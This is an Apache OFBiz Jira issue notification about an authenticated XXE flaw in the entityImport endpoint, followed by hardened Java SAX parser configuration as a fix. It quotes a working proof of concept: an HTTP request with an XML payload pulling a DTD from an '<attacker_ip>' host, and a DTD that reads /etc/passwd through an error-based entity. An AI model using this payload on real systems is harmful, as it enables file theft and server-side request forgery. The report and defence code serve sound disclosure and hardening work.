Jacques Le Roux created OFBIZ-11195:
---------------------------------------
Summary: XML Entity Injection in webtools/control/entityImport
Key: OFBIZ-11195
URL: https://issues.apache.org/jira/browse/OFBIZ-11195
Project: OFBiz
Issue Type: Bug
Components: framework/webtools
Affects Versions: Trunk
Reporter: Jacques Le Roux
This was reported to the OFBiz security team by Jason Nordenstam from
offensive-security.com. We did not consider it a real security issue because
it requires authentication.
{quote}
Authenticated users can import XML documents containing DTDs. The SAX parser
used by the XML Data Import functionality does not have DTD parsing explicitly
disabled, which makes it vulnerable to XXE attacks.
The results of the import are not displayed in the page which means an
'error-based' approach is needed to read local files. The parser will also
resolve external entities so this vulnerability can also be used for internal
port scanning or server-side request forgery.
Affected URL:
/webtools/control/entityImport
POC Example Request:
{code}
POST /webtools/control/entityImport HTTP/1.1
Host:<host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <host>/webtools/control/entityImport
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
Connection: close
Upgrade-Insecure-Requests: 1
fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
{code}
Payload One Decoded:
{code:xml}
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE notfound [
<!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
%base;
%param1;
%external;
]>
<root><foo>bar</bar></root>
{code}
error.dtd on Attacking Machine:
{code:xml}
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
{code}
{quote}
We have reproduced it at
[https://demo-stable.ofbiz.apache.org/webtools/control/entityImport]
using:
{code:xml}
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE notfound [
<!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
%base;
%param1;
%external;
]>
<root><foo>bar</bar></root>
{code}
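The report above turns on one fact: the SAX parser behind the import endpoint does not have DTD processing disabled, so a document may declare parameter entities that the parser resolves from the network and the local filesystem. As an added example (not OFBiz code, and not the fix the project shipped for this issue), the following shows the JAXP configuration a defender applies to such an import path: reject any DOCTYPE outright, and as defence in depth refuse external general entities, external parameter entities and external DTD loading. The feature URIs are the standard Xerces/JAXP names honoured by the JDK's built-in parser; the class name, the element-counting handler and the two sample documents are this example's own constructions.

```java
import java.io.IOException;
import java.io.StringReader;

import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;

import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

/**
 * Illustrative hardened SAX setup for an XML import endpoint. Added example,
 * not OFBiz code; the sample documents below are constructed for the demo.
 */
public final class HardenedXmlImport {

    /** Builds a SAXParserFactory that refuses DOCTYPEs and external entities. */
    public static SAXParserFactory hardenedFactory()
            throws ParserConfigurationException, SAXException {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Primary defence: reject any <!DOCTYPE ...> before it is processed.
        // Without a DTD the document cannot declare entities at all.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments that must tolerate a DTD: never fetch
        // external general or parameter entities and never load an external DTD.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // XInclude is another route to local file content; keep it off.
        factory.setXIncludeAware(false);
        factory.setNamespaceAware(true);
        return factory;
    }

    /** Parses importXml with the hardened parser and returns the element count. */
    public static int parseImport(String importXml)
            throws ParserConfigurationException, SAXException, IOException {
        SAXParser parser = hardenedFactory().newSAXParser();
        final int[] elements = {0};
        parser.parse(new InputSource(new StringReader(importXml)), new DefaultHandler() {
            @Override
            public void startElement(String uri, String localName, String qName, Attributes atts) {
                elements[0]++;
            }
        });
        return elements[0];
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a well-formed import document with no DTD.
        String clean = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
                + "<root><foo>bar</foo></root>";
        System.out.println("clean document accepted, elements=" + parseImport(clean));

        // Constructed sample: the same document carrying a harmless internal DTD.
        // With disallow-doctype-decl set, the parser stops at the DOCTYPE itself,
        // so no entity, internal or external, is ever resolved.
        String withDoctype = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE root [ <!ENTITY greeting \"hi\"> ]>\n"
                + "<root>&greeting;</root>";
        try {
            parseImport(withDoctype);
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (SAXParseException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Whether a given feature URI is honoured depends on the SAXParserFactory implementation on the classpath; the JDK's built-in Xerces supports all four, and an implementation that does not will throw SAXNotRecognizedException from setFeature, which is the right failure mode for a security control (the import refuses to start rather than silently running unprotected). Because the import result is never rendered back to the user, the rejection message belongs in the server log, where a burst of DOCTYPE rejections on this endpoint is a useful detection signal.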
--
This message was sent by Atlassian Jira
(v8.3.2#803003)